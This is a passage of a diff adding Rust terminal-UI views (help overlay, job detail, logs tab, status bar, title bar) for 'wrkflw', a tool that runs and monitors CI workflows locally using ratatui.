.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Browse & select workflows"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View workflow files")]),
|
||||
Line::from(vec![Span::raw(" • Select multiple for batch execution")]),
|
||||
Line::from(vec![Span::raw(" • Trigger remote workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"2. Execution",
|
||||
Style::default()
|
||||
.fg(Color::Green)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Monitor job progress"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • View job status and details")]),
|
||||
Line::from(vec![Span::raw(" • Enter job details with Enter")]),
|
||||
Line::from(vec![Span::raw(" • Navigate step execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"3. Logs",
|
||||
Style::default()
|
||||
.fg(Color::Blue)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - View execution logs"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" • Search and filter logs")]),
|
||||
Line::from(vec![Span::raw(" • Real-time log streaming")]),
|
||||
Line::from(vec![Span::raw(" • Navigate search results")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"4. Help",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - This comprehensive guide"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"🎯 QUICK ACTIONS",
|
||||
Style::default().fg(Color::Red).add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"?",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Toggle help overlay"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled(
|
||||
"q",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" - Quit application"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(Span::styled(
|
||||
"💡 TIPS",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("emulation mode", Style::default().fg(Color::Red)),
|
||||
Span::raw(" when containers"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" are unavailable or for quick testing")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Secure emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" provides sandboxing"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for untrusted workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("validation mode", Style::default().fg(Color::Green)),
|
||||
Span::raw(" to check"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" workflows without execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Preserve containers", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" on failure"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for debugging (Docker/Podman only)")]),
|
||||
];
|
||||
|
||||
// Apply scroll offset to the content
|
||||
let left_help_text = if scroll_offset < left_help_text.len() {
|
||||
left_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
let right_help_text = if scroll_offset < right_help_text.len() {
|
||||
right_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
// Render left column
|
||||
let left_widget = Paragraph::new(left_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" WRKFLW Help - Controls & Features ",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
// Render right column
|
||||
let right_widget = Paragraph::new(right_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Interface Guide & Tips ",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
f.render_widget(left_widget, chunks[0]);
|
||||
f.render_widget(right_widget, chunks[1]);
|
||||
}
|
||||
|
||||
// Render a help overlay
|
||||
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>, scroll_offset: usize) {
|
||||
let size = f.size();
|
||||
|
||||
// Create a larger centered modal to accommodate comprehensive help content
|
||||
let width = (size.width * 9 / 10).min(120); // Use 90% of width, max 120 chars
|
||||
let height = (size.height * 9 / 10).min(40); // Use 90% of height, max 40 lines
|
||||
let x = (size.width - width) / 2;
|
||||
let y = (size.height - height) / 2;
|
||||
|
||||
let help_area = Rect {
|
||||
x,
|
||||
y,
|
||||
width,
|
||||
height,
|
||||
};
|
||||
|
||||
// Create a semi-transparent dark background for better visibility
|
||||
let clear = Block::default().style(Style::default().bg(Color::Black));
|
||||
f.render_widget(clear, size);
|
||||
|
||||
// Add a border around the entire overlay for better visual separation
|
||||
let overlay_block = Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Double)
|
||||
.style(Style::default().bg(Color::Black).fg(Color::White))
|
||||
.title(Span::styled(
|
||||
" Press ? or Esc to close help ",
|
||||
Style::default()
|
||||
.fg(Color::Gray)
|
||||
.add_modifier(Modifier::ITALIC),
|
||||
));
|
||||
|
||||
f.render_widget(overlay_block, help_area);
|
||||
|
||||
// Create inner area for content
|
||||
let inner_area = Rect {
|
||||
x: help_area.x + 1,
|
||||
y: help_area.y + 1,
|
||||
width: help_area.width.saturating_sub(2),
|
||||
height: help_area.height.saturating_sub(2),
|
||||
};
|
||||
|
||||
// Render the help content with scroll support
|
||||
render_help_content(f, inner_area, scroll_offset);
|
||||
}
|
||||
211 crates/ui/src/views/job_detail.rs (Normal file)
@@ -0,0 +1,211 @@
|
||||
// Job detail view rendering
|
||||
use crate::app::App;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Paragraph, Row, Table},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the job detail view
|
||||
pub fn render_job_detail_view(
|
||||
f: &mut Frame<CrosstermBackend<io::Stdout>>,
|
||||
app: &mut App,
|
||||
area: Rect,
|
||||
) {
|
||||
// Get the workflow index either from current_execution or selected workflow
|
||||
let current_workflow_idx = app
|
||||
.current_execution
|
||||
.or_else(|| app.workflow_list_state.selected())
|
||||
.filter(|&idx| idx < app.workflows.len());
|
||||
|
||||
if let Some(workflow_idx) = current_workflow_idx {
|
||||
// Only proceed if we have execution details
|
||||
if let Some(execution) = &app.workflows[workflow_idx].execution_details {
|
||||
// Only proceed if we have a valid job selection
|
||||
if let Some(job_idx) = app.job_list_state.selected() {
|
||||
if job_idx < execution.jobs.len() {
|
||||
let job = &execution.jobs[job_idx];
|
||||
|
||||
// Split the area into sections
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Vertical)
|
||||
.constraints(
|
||||
[
|
||||
Constraint::Length(3), // Job title
|
||||
Constraint::Min(5), // Steps table
|
||||
Constraint::Length(8), // Step details
|
||||
]
|
||||
.as_ref(),
|
||||
)
|
||||
.margin(1)
|
||||
.split(area);
|
||||
|
||||
// Job title section
|
||||
let status_text = match job.status {
|
||||
wrkflw_executor::JobStatus::Success => "Success",
|
||||
wrkflw_executor::JobStatus::Failure => "Failed",
|
||||
wrkflw_executor::JobStatus::Skipped => "Skipped",
|
||||
};
|
||||
|
||||
let status_style = match job.status {
|
||||
wrkflw_executor::JobStatus::Success => Style::default().fg(Color::Green),
|
||||
wrkflw_executor::JobStatus::Failure => Style::default().fg(Color::Red),
|
||||
wrkflw_executor::JobStatus::Skipped => Style::default().fg(Color::Yellow),
|
||||
};
|
||||
|
||||
let job_title = Paragraph::new(vec![
|
||||
Line::from(vec![
|
||||
Span::styled("Job: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
job.name.clone(),
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" ("),
|
||||
Span::styled(status_text, status_style),
|
||||
Span::raw(")"),
|
||||
]),
|
||||
Line::from(vec![
|
||||
Span::styled("Steps: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
format!("{}", job.steps.len()),
|
||||
Style::default().fg(Color::White),
|
||||
),
|
||||
]),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Job Details ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
);
|
||||
|
||||
f.render_widget(job_title, chunks[0]);
|
||||
|
||||
// Steps section
|
||||
let header_cells = ["Status", "Step Name"].iter().map(|h| {
|
||||
ratatui::widgets::Cell::from(*h).style(Style::default().fg(Color::Yellow))
|
||||
});
|
||||
|
||||
let header = Row::new(header_cells)
|
||||
.style(Style::default().add_modifier(Modifier::BOLD))
|
||||
.height(1);
|
||||
|
||||
let rows = job.steps.iter().map(|step| {
|
||||
let status_symbol = match step.status {
|
||||
wrkflw_executor::StepStatus::Success => "✅",
|
||||
wrkflw_executor::StepStatus::Failure => "❌",
|
||||
wrkflw_executor::StepStatus::Skipped => "⏭",
|
||||
};
|
||||
|
||||
let status_style = match step.status {
|
||||
wrkflw_executor::StepStatus::Success => {
|
||||
Style::default().fg(Color::Green)
|
||||
}
|
||||
wrkflw_executor::StepStatus::Failure => Style::default().fg(Color::Red),
|
||||
wrkflw_executor::StepStatus::Skipped => {
|
||||
Style::default().fg(Color::Gray)
|
||||
}
|
||||
};
|
||||
|
||||
Row::new(vec![
|
||||
ratatui::widgets::Cell::from(status_symbol).style(status_style),
|
||||
ratatui::widgets::Cell::from(step.name.clone()),
|
||||
])
|
||||
});
|
||||
|
||||
let steps_table = Table::new(rows)
|
||||
.header(header)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Steps ", Style::default().fg(Color::Yellow))),
|
||||
)
|
||||
.highlight_style(
|
||||
Style::default()
|
||||
.bg(Color::DarkGray)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)
|
||||
.highlight_symbol("» ")
|
||||
.widths(&[
|
||||
Constraint::Length(8), // Status icon column
|
||||
Constraint::Percentage(92), // Name column
|
||||
]);
|
||||
|
||||
// We need to use the table state from the app
|
||||
f.render_stateful_widget(steps_table, chunks[1], &mut app.step_table_state);
|
||||
|
||||
// Step detail section
|
||||
if let Some(step_idx) = app.step_table_state.selected() {
|
||||
if step_idx < job.steps.len() {
|
||||
let step = &job.steps[step_idx];
|
||||
|
||||
// Show step output with proper styling
|
||||
let status_text = match step.status {
|
||||
wrkflw_executor::StepStatus::Success => "Success",
|
||||
wrkflw_executor::StepStatus::Failure => "Failed",
|
||||
wrkflw_executor::StepStatus::Skipped => "Skipped",
|
||||
};
|
||||
|
||||
let status_style = match step.status {
|
||||
wrkflw_executor::StepStatus::Success => {
|
||||
Style::default().fg(Color::Green)
|
||||
}
|
||||
wrkflw_executor::StepStatus::Failure => {
|
||||
Style::default().fg(Color::Red)
|
||||
}
|
||||
wrkflw_executor::StepStatus::Skipped => {
|
||||
Style::default().fg(Color::Yellow)
|
||||
}
|
||||
};
|
||||
|
||||
let mut output_text = step.output.clone();
|
||||
// Truncate if too long
|
||||
if output_text.len() > 1000 {
|
||||
output_text = format!("{}... [truncated]", &output_text[..1000]);
|
||||
}
|
||||
|
||||
let step_detail = Paragraph::new(vec![
|
||||
Line::from(vec![
|
||||
Span::styled("Step: ", Style::default().fg(Color::Blue)),
|
||||
Span::styled(
|
||||
step.name.clone(),
|
||||
Style::default()
|
||||
.fg(Color::White)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
),
|
||||
Span::raw(" ("),
|
||||
Span::styled(status_text, status_style),
|
||||
Span::raw(")"),
|
||||
]),
|
||||
Line::from(""),
|
||||
Line::from(output_text),
|
||||
])
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Step Output ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.wrap(ratatui::widgets::Wrap { trim: false });
|
||||
|
||||
f.render_widget(step_detail, chunks[2]);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
209 crates/ui/src/views/logs_tab.rs (new file)
@@ -0,0 +1,209 @@
|
||||
// Logs tab rendering
|
||||
use crate::app::App;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Constraint, Direction, Layout, Rect},
|
||||
style::{Color, Modifier, Style},
|
||||
text::{Line, Span},
|
||||
widgets::{Block, BorderType, Borders, Cell, Paragraph, Row, Table, TableState},
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
|
||||
// Render the logs tab
|
||||
pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
|
||||
// Split the area into header, search bar (optionally shown), and log content
|
||||
let chunks = Layout::default()
|
||||
.direction(Direction::Vertical)
|
||||
.constraints(
|
||||
[
|
||||
Constraint::Length(3), // Header with instructions
|
||||
Constraint::Length(
|
||||
if app.log_search_active
|
||||
|| !app.log_search_query.is_empty()
|
||||
|| app.log_filter_level.is_some()
|
||||
{
|
||||
3
|
||||
} else {
|
||||
0
|
||||
},
|
||||
), // Search bar (optional)
|
||||
Constraint::Min(3), // Logs content
|
||||
]
|
||||
.as_ref(),
|
||||
)
|
||||
.margin(1)
|
||||
.split(area);
|
||||
|
||||
// Determine if search/filter bar should be shown
|
||||
let show_search_bar =
|
||||
app.log_search_active || !app.log_search_query.is_empty() || app.log_filter_level.is_some();
|
||||
|
||||
// Render header with instructions
|
||||
let mut header_text = vec![
|
||||
Line::from(vec![Span::styled(
|
||||
"Execution and System Logs",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)]),
|
||||
Line::from(vec![
|
||||
Span::styled("↑/↓", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(" or "),
|
||||
Span::styled("j/k", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Navigate logs/matches "),
|
||||
Span::styled("s", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Search "),
|
||||
Span::styled("f", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Filter "),
|
||||
Span::styled("Tab", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Switch tabs"),
|
||||
]),
|
||||
];
|
||||
|
||||
if show_search_bar {
|
||||
header_text.push(Line::from(vec![
|
||||
Span::styled("Enter", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Apply search "),
|
||||
Span::styled("Esc", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Clear search "),
|
||||
Span::styled("c", Style::default().fg(Color::Cyan)),
|
||||
Span::raw(": Clear all filters"),
|
||||
]));
|
||||
}
|
||||
|
||||
let header = Paragraph::new(header_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded),
|
||||
)
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(header, chunks[0]);
|
||||
|
||||
// Render search bar if active or has content
|
||||
if show_search_bar {
|
||||
let search_text = if app.log_search_active {
|
||||
format!("Search: {}█", app.log_search_query)
|
||||
} else {
|
||||
format!("Search: {}", app.log_search_query)
|
||||
};
|
||||
|
||||
let filter_text = match &app.log_filter_level {
|
||||
Some(level) => format!("Filter: {}", level.to_string()),
|
||||
None => "No filter".to_string(),
|
||||
};
|
||||
|
||||
let match_info = if !app.log_search_matches.is_empty() {
|
||||
format!(
|
||||
"Matches: {}/{}",
|
||||
app.log_search_match_idx + 1,
|
||||
app.log_search_matches.len()
|
||||
)
|
||||
} else if !app.log_search_query.is_empty() {
|
||||
"No matches".to_string()
|
||||
} else {
|
||||
"".to_string()
|
||||
};
|
||||
|
||||
let search_info = Line::from(vec![
|
||||
Span::raw(search_text),
|
||||
Span::raw(" "),
|
||||
Span::styled(
|
||||
filter_text,
|
||||
Style::default().fg(match &app.log_filter_level {
|
||||
Some(crate::models::LogFilterLevel::Error) => Color::Red,
|
||||
Some(crate::models::LogFilterLevel::Warning) => Color::Yellow,
|
||||
Some(crate::models::LogFilterLevel::Info) => Color::Cyan,
|
||||
Some(crate::models::LogFilterLevel::Success) => Color::Green,
|
||||
Some(crate::models::LogFilterLevel::Trigger) => Color::Magenta,
|
||||
Some(crate::models::LogFilterLevel::All) | None => Color::Gray,
|
||||
}),
|
||||
),
|
||||
Span::raw(" "),
|
||||
Span::styled(match_info, Style::default().fg(Color::Magenta)),
|
||||
]);
|
||||
|
||||
let search_block = Paragraph::new(search_info)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Search & Filter ",
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.alignment(Alignment::Left);
|
||||
|
||||
f.render_widget(search_block, chunks[1]);
|
||||
}
|
||||
|
||||
// Use processed logs from background thread instead of processing on every frame
|
||||
let filtered_logs = &app.processed_logs;
|
||||
|
||||
// Create a table for logs for better organization
|
||||
let header_cells = ["Time", "Type", "Message"]
|
||||
.iter()
|
||||
.map(|h| Cell::from(*h).style(Style::default().fg(Color::Yellow)));
|
||||
|
||||
let header = Row::new(header_cells)
|
||||
.style(Style::default().add_modifier(Modifier::BOLD))
|
||||
.height(1);
|
||||
|
||||
// Convert processed logs to table rows - this is now very fast since logs are pre-processed
|
||||
let rows = filtered_logs
|
||||
.iter()
|
||||
.map(|processed_log| processed_log.to_row());
|
||||
|
||||
let content_idx = if show_search_bar { 2 } else { 1 };
|
||||
|
||||
let log_table = Table::new(rows)
|
||||
.header(header)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
format!(
|
||||
" Logs ({}/{}) ",
|
||||
if filtered_logs.is_empty() {
|
||||
0
|
||||
} else {
|
||||
app.log_scroll + 1
|
||||
},
|
||||
filtered_logs.len()
|
||||
),
|
||||
Style::default().fg(Color::Yellow),
|
||||
)),
|
||||
)
|
||||
.highlight_style(Style::default().bg(Color::DarkGray))
|
||||
.widths(&[
|
||||
Constraint::Length(10), // Timestamp column
|
||||
Constraint::Length(7), // Log type column
|
||||
Constraint::Percentage(80), // Message column
|
||||
]);
|
||||
|
||||
// We need to convert log_scroll index to a TableState
|
||||
let mut log_table_state = TableState::default();
|
||||
|
||||
if !filtered_logs.is_empty() {
|
||||
// If we have search matches, use the match index as the selected row
|
||||
if !app.log_search_matches.is_empty() {
|
||||
// Make sure we're within bounds
|
||||
let _match_index = app
|
||||
.log_search_match_idx
|
||||
.min(app.log_search_matches.len() - 1);
|
||||
|
||||
// This would involve more complex logic to go from search matches to the filtered logs
|
||||
// For simplicity in this placeholder, we'll just use the scroll position
|
||||
log_table_state.select(Some(app.log_scroll.min(filtered_logs.len() - 1)));
|
||||
} else {
|
||||
// No search matches, use regular scroll position
|
||||
log_table_state.select(Some(app.log_scroll.min(filtered_logs.len() - 1)));
|
||||
}
|
||||
}
|
||||
|
||||
f.render_stateful_widget(log_table, chunks[content_idx], &mut log_table_state);
|
||||
}
|
||||
57 crates/ui/src/views/mod.rs (new file)
@@ -0,0 +1,57 @@
// UI Views module
mod execution_tab;
mod help_overlay;
mod job_detail;
mod logs_tab;
mod status_bar;
mod title_bar;
mod workflows_tab;

use crate::app::App;
use ratatui::{backend::CrosstermBackend, Frame};
use std::io;

// Main render function for the UI
pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
    // Check if help should be shown as an overlay
    if app.show_help {
        help_overlay::render_help_overlay(f, app.help_scroll);
        return;
    }

    let size = f.size();

    // Create main layout
    let main_chunks = ratatui::layout::Layout::default()
        .direction(ratatui::layout::Direction::Vertical)
        .constraints(
            [
                ratatui::layout::Constraint::Length(3), // Title bar and tabs
                ratatui::layout::Constraint::Min(5),    // Main content
                ratatui::layout::Constraint::Length(2), // Status bar
            ]
            .as_ref(),
        )
        .split(size);

    // Render title bar with tabs
    title_bar::render_title_bar(f, app, main_chunks[0]);

    // Render main content based on selected tab
    match app.selected_tab {
        0 => workflows_tab::render_workflows_tab(f, app, main_chunks[1]),
        1 => {
            if app.detailed_view {
                job_detail::render_job_detail_view(f, app, main_chunks[1])
            } else {
                execution_tab::render_execution_tab(f, app, main_chunks[1])
            }
        }
        2 => logs_tab::render_logs_tab(f, app, main_chunks[1]),
        3 => help_overlay::render_help_content(f, main_chunks[1], app.help_scroll),
        _ => {}
    }

    // Render status bar
    status_bar::render_status_bar(f, app, main_chunks[2]);
}
212 crates/ui/src/views/status_bar.rs (new file)
@@ -0,0 +1,212 @@
|
||||
// Status bar rendering
|
||||
use crate::app::App;
|
||||
use ratatui::{
|
||||
backend::CrosstermBackend,
|
||||
layout::{Alignment, Rect},
|
||||
style::{Color, Style},
|
||||
text::{Line, Span},
|
||||
widgets::Paragraph,
|
||||
Frame,
|
||||
};
|
||||
use std::io;
|
||||
use wrkflw_executor::RuntimeType;
|
||||
|
||||
// Render the status bar
|
||||
pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
|
||||
// If we have a status message, show it instead of the normal status bar
|
||||
if let Some(message) = &app.status_message {
|
||||
// Determine if this is a success message (starts with ✅)
|
||||
let is_success = message.starts_with("✅");
|
||||
|
||||
let status_message = Paragraph::new(Line::from(vec![Span::styled(
|
||||
format!(" {} ", message),
|
||||
Style::default()
|
||||
.bg(if is_success { Color::Green } else { Color::Red })
|
||||
.fg(Color::White)
|
||||
.add_modifier(ratatui::style::Modifier::BOLD),
|
||||
)]))
|
||||
.alignment(Alignment::Center);
|
||||
|
||||
f.render_widget(status_message, area);
|
||||
return;
|
||||
}
|
||||
|
||||
// Normal status bar
|
||||
let mut status_items = vec![];
|
||||
|
||||
// Add mode info
|
||||
status_items.push(Span::styled(
|
||||
format!(" {} ", app.runtime_type_name()),
|
||||
Style::default()
|
||||
.bg(match app.runtime_type {
|
||||
RuntimeType::Docker => Color::Blue,
|
||||
RuntimeType::Podman => Color::Cyan,
|
||||
RuntimeType::SecureEmulation => Color::Green,
|
||||
RuntimeType::Emulation => Color::Red,
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
|
||||
// Add container runtime status if relevant
|
||||
match app.runtime_type {
|
||||
RuntimeType::Docker => {
|
||||
// Check Docker silently using safe FD redirection
|
||||
let is_docker_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::docker::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Docker availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
if is_docker_available {
|
||||
" Docker: Connected "
|
||||
} else {
|
||||
" Docker: Not Available "
|
||||
},
|
||||
Style::default()
|
||||
.bg(if is_docker_available {
|
||||
Color::Green
|
||||
} else {
|
||||
Color::Red
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::Podman => {
|
||||
// Check Podman silently using safe FD redirection
|
||||
let is_podman_available = match wrkflw_utils::fd::with_stderr_to_null(
|
||||
wrkflw_executor::podman::is_available,
|
||||
) {
|
||||
Ok(result) => result,
|
||||
Err(_) => {
|
||||
wrkflw_logging::debug(
|
||||
"Failed to redirect stderr when checking Podman availability.",
|
||||
);
|
||||
false
|
||||
}
|
||||
};
|
||||
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
if is_podman_available {
|
||||
" Podman: Connected "
|
||||
} else {
|
||||
" Podman: Not Available "
|
||||
},
|
||||
Style::default()
|
||||
.bg(if is_podman_available {
|
||||
Color::Green
|
||||
} else {
|
||||
Color::Red
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::SecureEmulation => {
|
||||
status_items.push(Span::styled(
|
||||
" 🔒SECURE ",
|
||||
Style::default().bg(Color::Green).fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::Emulation => {
|
||||
// No need to check anything for emulation mode
|
||||
}
|
||||
}
|
||||
|
||||
// Add validation/execution mode
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
format!(
|
||||
" {} ",
|
||||
if app.validation_mode {
|
||||
"Validation"
|
||||
} else {
|
||||
"Execution"
|
||||
}
|
||||
),
|
||||
Style::default()
|
||||
.bg(if app.validation_mode {
|
||||
Color::Yellow
|
||||
} else {
|
||||
Color::Green
|
||||
})
|
||||
.fg(Color::Black),
|
||||
));
|
||||
|
||||
// Add context-specific help based on current tab
|
||||
status_items.push(Span::raw(" "));
|
||||
let help_text = match app.selected_tab {
|
||||
0 => {
|
||||
if let Some(idx) = app.workflow_list_state.selected() {
|
||||
if idx < app.workflows.len() {
|
||||
let workflow = &app.workflows[idx];
|
||||
match workflow.status {
|
||||
crate::models::WorkflowStatus::NotStarted => "[Space] Toggle selection [Enter] Run selected [r] Run all selected [t] Trigger Workflow [Shift+R] Reset workflow",
|
||||
crate::models::WorkflowStatus::Running => "[Space] Toggle selection [Enter] Run selected [r] Run all selected (Workflow running...)",
|
||||
crate::models::WorkflowStatus::Success | crate::models::WorkflowStatus::Failed | crate::models::WorkflowStatus::Skipped => "[Space] Toggle selection [Enter] Run selected [r] Run all selected [Shift+R] Reset workflow",
|
||||
}
|
||||
} else {
|
||||
"[Space] Toggle selection [Enter] Run selected [r] Run all selected"
|
||||
}
|
||||
} else {
|
||||
"[Space] Toggle selection [Enter] Run selected [r] Run all selected"
|
||||
}
|
||||
}
|
||||
1 => {
|
||||
if app.detailed_view {
|
||||
"[Esc] Back to jobs [↑/↓] Navigate steps"
|
||||
} else {
|
||||
"[Enter] View details [↑/↓] Navigate jobs"
|
||||
}
|
||||
}
|
||||
2 => {
|
||||
// For logs tab, show scrolling instructions
|
||||
let log_count = app.logs.len() + wrkflw_logging::get_logs().len();
|
||||
if log_count > 0 {
|
||||
// Convert to a static string for consistent return type
|
||||
let scroll_text = format!(
|
||||
"[↑/↓] Scroll logs ({}/{}) [s] Search [f] Filter",
|
||||
app.log_scroll + 1,
|
||||
log_count
|
||||
);
|
||||
Box::leak(scroll_text.into_boxed_str())
|
||||
} else {
|
||||
"[No logs to display]"
|
||||
}
|
||||
}
|
||||
3 => "[↑/↓] Scroll help [?] Toggle help overlay",
|
||||
_ => "",
|
||||
};
|
||||
status_items.push(Span::styled(
|
||||
format!(" {} ", help_text),
|
||||
Style::default().fg(Color::White),
|
||||
));
|
||||
|
||||
// Show keybindings for common actions
|
||||
status_items.push(Span::raw(" "));
|
||||
status_items.push(Span::styled(
|
||||
" [Tab] Switch tabs ",
|
||||
Style::default().fg(Color::White),
|
||||
));
|
||||
status_items.push(Span::styled(
|
||||
" [?] Help ",
|
||||
Style::default().fg(Color::White),
|
||||
));
|
||||
status_items.push(Span::styled(
|
||||
" [q] Quit ",
|
||||
Style::default().fg(Color::White),
|
||||
));
|
||||
|
||||
let status_bar = Paragraph::new(Line::from(status_items))
|
||||
.style(Style::default().bg(Color::DarkGray))
|
||||
.alignment(Alignment::Left);
|
||||
|
||||
f.render_widget(status_bar, area);
|
||||
}
|
||||
74 crates/ui/src/views/title_bar.rs (new file)
@@ -0,0 +1,74 @@
// Title bar rendering
use crate::app::App;
use ratatui::{
    backend::CrosstermBackend,
    layout::{Alignment, Rect},
    style::{Color, Modifier, Style},
    text::{Line, Span},
    widgets::{Block, BorderType, Borders, Tabs},
    Frame,
};
use std::io;

// Render the title bar with tabs
pub fn render_title_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, area: Rect) {
    let titles = ["Workflows", "Execution", "Logs", "Help"];
    let tabs = Tabs::new(
        titles
            .iter()
            .enumerate()
            .map(|(i, t)| {
                if i == 1 {
                    // Special case for "Execution"
                    let e_part = &t[0..1]; // "E"
                    let x_part = &t[1..2]; // "x"
                    let rest = &t[2..]; // "ecution"
                    Line::from(vec![
                        Span::styled(e_part, Style::default().fg(Color::White)),
                        Span::styled(
                            x_part,
                            Style::default()
                                .fg(Color::Yellow)
                                .add_modifier(Modifier::UNDERLINED),
                        ),
